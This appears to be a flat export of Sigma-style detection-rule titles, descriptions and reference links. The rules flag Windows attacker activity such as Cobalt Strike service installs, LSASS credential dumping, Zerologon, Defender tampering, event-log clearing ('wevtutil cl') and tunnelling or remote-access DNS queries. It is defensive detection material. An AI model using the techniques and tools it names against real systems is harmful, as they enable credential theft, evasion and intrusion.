Active Directory Certificate Services Denied Certificate Enrollment Request Detects denied requests by Active Directory Certificate Services. Example of these requests denial include issues with permissions on the certificate template or invalid signatures. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd299871(v=ws.10), https://www.gradenegger.eu/en/details-of-the-event-with-id-53-of-the-source-microsoft-windows-certificationauthority/
DHCP Server Error Failed Loading the CallOut DLL This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
DHCP Server Loaded the CallOut DLL This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
Potential CVE-2021-42287 Exploitation Attempt The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object. https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/
Local Privilege Escalation Indicator TabTip Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode https://github.com/antonioCoco/JuicyPotatoNG
Eventlog Cleared One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
Important Windows Eventlog Cleared Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
KDC RC4-HMAC Downgrade CVE-2022-37966 Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d
Certificate Use With No Strong Mapping Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID) This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing. https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
No Suitable Encryption Key Found For Generating Kerberos Ticket Detects errors when a target server doesn't have suitable keys for generating kerberos tickets. This issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10), https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled
Critical Hive In Suspicious Location Access Bits Cleared Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior. https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md
Volume Shadow Copy Mount Detects volume shadow copy mount via Windows event log https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
Suspicious Usage of CVE_2021_34484 or CVE 2022_21919 During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \Users\TEMP is created may be created during the exploitation. Viewed on 2008 Server https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html
Windows Update Error Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed. https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1903/W10_1903_Pro_20200714_18362.959/WEPExplorer/Microsoft-Windows-WindowsUpdateClient.xml
Zerologon Exploitation Using Well-known Tools This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname. https://www.secura.com/blog/zero-logon, https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382
Vulnerable Netlogon Secure Channel Connection Allowed Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472. https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
NTFS Vulnerability Exploitation This the exploitation of a NTFS vulnerability as reported without many details via Twitter https://twitter.com/jonasLyk/status/1347900440000811010, https://twitter.com/wdormann/status/1347958161609809921, https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/
Windows Defender Threat Detection Service Disabled Detects when the "Windows Defender Threat Protection" service is disabled. https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
CobaltStrike Service Installations - System Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement https://www.sans.org/webcasts/119395, https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
smbexec.py Service Installation Detects the use of smbexec.py tool by detecting a specific service installation https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/, https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296, https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60
Invoke-Obfuscation CLIP+ Launcher - System Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation - System Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher - System Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher - System Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION - System Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin - System Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER - System Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip - System Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA - System Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 - System Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
KrbRelayUp Service Installation Detects service creation from KrbRelayUp tool used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default settings) https://github.com/Dec0ne/KrbRelayUp
Credential Dumping Tools Service Execution - System Detects well-known credential dumping tools execution via service execution events https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Meterpreter or Cobalt Strike Getsystem Service Installation - System Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
Moriya Rootkit - System Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
PowerShell Scripts Installed as Services Detects powershell script installed as a Service https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Anydesk Remote Access Software Service Installation Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used. https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
CSExec Service Installation Detects CSExec service installation and execution events https://github.com/malcomvetter/CSExec
HackTool Service Registration or Execution Detects installation or execution of services Internal Research
Mesh Agent Service Installation Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
NetSupport Manager Service Install Detects NetSupport Manager service installation on the target system. http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf
PAExec Service Installation Detects PAExec service installation https://www.poweradmin.com/paexec/
New PDQDeploy Service - Server Side Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines. PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm
New PDQDeploy Service - Client Side Detects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1 https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm
ProcessHacker Privilege Elevation Detects a ProcessHacker tool that elevated privileges to a very high level https://twitter.com/1kwpeter/status/1397816101455765504
RemCom Service Installation Detects RemCom service installation and execution events https://github.com/kavika13/RemCom/
Remote Access Tool Services Have Been Installed - System Detects service installation of different remote access tools software. These software are often abused by threat actors to perform https://redcanary.com/blog/misbehaving-rats/
Remote Utilities Host Service Install Detects Remote Utilities Host service installation on the target system. https://www.remoteutilities.com/support/kb/host-service-won-t-start/
Sliver C2 Default Service Installation Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231, https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
Service Installed By Unusual Client - System Detects a service installed by a client which has PID 0 or whose parent has PID 0 https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html
Suspicious Service Installation Detects suspicious service installation commands Internal Research
PsExec Service Installation Detects PsExec service installation and execution events https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
Tap Driver Installation Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers
TacticalRMM Service Installation Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool. https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
Uncommon Service Installation Image Path Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc. Internal Research
Important Windows Service Terminated With Error Detects important or interesting Windows services that got terminated for whatever reason https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/
Windows Service Terminated With Error Detects Windows services that got terminated for whatever reason https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/
Important Windows Service Terminated Unexpectedly Detects important or interesting Windows services that got terminated unexpectedly. https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
RTCore Suspicious Service Installation Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp
Service Installation in Suspicious Folder Detects service installation in suspicious folder appdata Internal Research
Service Installation with Suspicious Folder Pattern Detects service installation with suspicious folder patterns Internal Research
Suspicious Service Installation Script Detects suspicious service installation scripts Internal Research
Potential RDP Exploit CVE-2019-0708 Detect suspicious error on protocol RDP, potential CVE-2019-0708 https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708, https://github.com/Ekultek/BlueKeep
Scheduled Task Executed From A Suspicious Location Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task Internal Research
Scheduled Task Executed Uncommon LOLBIN Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task Internal Research
Important Scheduled Task Deleted Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/
Ngrok Usage with Remote Desktop Service Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg, https://ngrok.com/
Windows Defender Grace Period Expired Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled. https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/
LSASS Access Detected via Attack Surface Reduction Detects Access to LSASS Process https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction
PSExec and WMI Process Creations Block Detects blocking of process creations originating from PSExec and WMI commands https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands, https://twitter.com/duff22b/status/1280166329660497920
Windows Defender Exclusions Added Detects the Setting of Windows Defender Exclusions https://twitter.com/_nullbind/status/1204923340810543109
Windows Defender Exploit Guard Tamper Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications" https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088
Windows Defender Submit Sample Feature Disabled Detects disabling of the "Automatic Sample Submission" feature of Windows Defender. https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide, https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware
Windows Defender Malware And PUA Scanning Disabled Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/
Windows Defender Malware Detection History Deletion Windows Defender logs when the history of detected infections is deleted. https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus, https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e
Windows Defender AMSI Trigger Detected Detects triggering of AMSI by Windows Defender. https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps
Windows Defender Real-time Protection Disabled Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initiated this action you might want to reduce it to a "medium" level if this occurs too many times in your environment https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/
Windows Defender Real-Time Protection Failure/Restart Detects issues with Windows Defender Real-Time Protection features Internal Research, https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/, https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346
Win Defender Restored Quarantine File Detects the restoration of files from the defender quarantine https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide
Windows Defender Configuration Changes Detects suspicious changes to the Windows Defender configuration https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide, https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware
Microsoft Defender Tamper Protection Trigger Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring" https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection, https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide
Windows Defender Threat Detected Detects actions taken by Windows Defender malware detection engines https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus
Windows Defender Virus Scanning Feature Disabled Detects disabling of the Windows Defender virus scanning feature https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/
WMI Persistence Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. https://twitter.com/mattifestation/status/899646620148539397, https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
HackTool - CACTUSTORCH Remote Thread Creation Detects remote thread creation from CACTUSTORCH as described in references. https://twitter.com/SBousseaden/status/1090588499517079552, https://github.com/mdsecactivebreach/CACTUSTORCH
HackTool - Potential CobaltStrike Process Injection Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f, https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/
Remote Thread Created In KeePass.EXE Detects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity https://www.cisa.gov/uscert/ncas/alerts/aa20-259a, https://github.com/denandz/KeeFarce, https://github.com/GhostPack/KeeThief
Remote Thread Creation In Mstsc.Exe From Suspicious Location Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials. https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25
Potential Credential Dumping Attempt Via PowerShell Remote Thread Detects remote thread creation by PowerShell processes into "lsass.exe" https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Password Dumper Remote Thread in LSASS Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events. https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm
Remote Thread Creation Via PowerShell In Uncommon Target Detects the creation of a remote thread from a Powershell process in an uncommon target process https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
Rare Remote Thread Creation By Uncommon Source Image Detects uncommon processes creating remote threads. Personal research, statistical analysis, https://lolbas-project.github.io
Remote Thread Created In Shell Application Detects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE". It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes. https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/, https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/
Remote Thread Creation By Uncommon Source Image Detects uncommon processes creating remote threads. Personal research, statistical analysis, https://lolbas-project.github.io
Remote Thread Creation In Uncommon Target Image Detects uncommon target processes for remote thread creation https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection
Remote Thread Creation Ttdinject.exe Proxy Detects a remote thread creation of Ttdinject.exe used as proxy https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/
Creation Of a Suspicious ADS File Outside a Browser Download Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/
Hidden Executable In NTFS Alternate Data Stream Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash https://twitter.com/0xrawsec/status/1002478725605273600?s=21
Suspicious File Download From File Sharing Websites - File Stream Detects the download of suspicious file type from a well-known file and paste sharing domain https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
Unusual File Download From File Sharing Websites - File Stream Detects the download of suspicious file type from a well-known file and paste sharing domain https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
HackTool Named File Stream Created Detects the creation of a named file stream with the imphash of a well-known hack tool https://github.com/gentilkiwi/mimikatz, https://github.com/topotam/PetitPotam, https://github.com/ohpe/juicy-potato, https://github.com/antonioCoco/RoguePotato, https://www.tarasco.org/security/pwdump_7/, https://github.com/fortra/nanodump, https://github.com/codewhitesec/HandleKatz, https://github.com/xuanxuan0/DripLoader, https://github.com/hfiref0x/UACME, https://github.com/outflanknl/Dumpert, https://github.com/wavestone-cdt/EDRSandblast
Exports Registry Key To an Alternate Data Stream Exports the target Registry key and hides it in the specified alternate data stream. https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Unusual File Download from Direct IP Address Detects the download of suspicious file type from URLs with IP https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md, https://labs.withsecure.com/publications/detecting-onenote-abuse
Potential Suspicious Winget Package Installation Detects potential suspicious winget package installation from a suspicious source. https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget
Potentially Suspicious File Download From ZIP TLD Detects the download of a file with a potentially suspicious extension from a .zip top level domain. https://twitter.com/cyb3rops/status/1659175181695287297, https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/
DNS Query for Anonfiles.com Domain - Sysmon Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
AppX Package Installation Attempts Via AppInstaller.EXE Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL https://twitter.com/notwhickey/status/1333900137232523264, https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/
Cloudflared Tunnels Related DNS Requests Detects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, Internal Research
DNS Query To Devtunnels Domain Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2, https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security, https://cydefops.com/devtunnels-unleashed
DNS Query To AzureWebsites.NET By Non-Browser Process Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/, https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/
DNS Server Discovery Via LDAP Query Detects DNS server discovery via LDAP query requests from uncommon applications https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04
DNS HybridConnectionManager Service Bus Detects Azure Hybrid Connection Manager services querying the Azure service bus service https://twitter.com/Cyb3rWard0g/status/1381642789369286662
Suspicious Cobalt Strike DNS Beaconing - Sysmon Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/
DNS Query To MEGA Hosting Website Detects DNS queries for subdomains related to MEGA sharing website https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/
DNS Query Request By QuickAssist.EXE Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session. https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/, https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/, https://x.com/cyb3rops/status/1862406110365245506, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist
DNS Query Request To OneLaunch Update Service Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain. https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf, https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/, https://malware.guide/browser-hijacker/remove-onelaunch-virus/
DNS Query Request By Regsvr32.EXE Detects DNS queries initiated by "Regsvr32.exe" https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/, https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
DNS Query To Remote Access Software Domain From Non-Browser App An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution, https://redcanary.com/blog/misbehaving-rats/, https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a, https://blog.sekoia.io/scattered-spider-laying-new-eggs/, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization
Suspicious DNS Query for IP Lookup Service APIs Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process. https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon, https://twitter.com/neonprimetime/status/1436376497980428318, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
TeamViewer Domain Query By Non-TeamViewer Application Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation) https://www.teamviewer.com/en-us/
DNS Query Tor .Onion Address - Sysmon Detects DNS queries to an ".onion" address related to Tor routing networks https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/
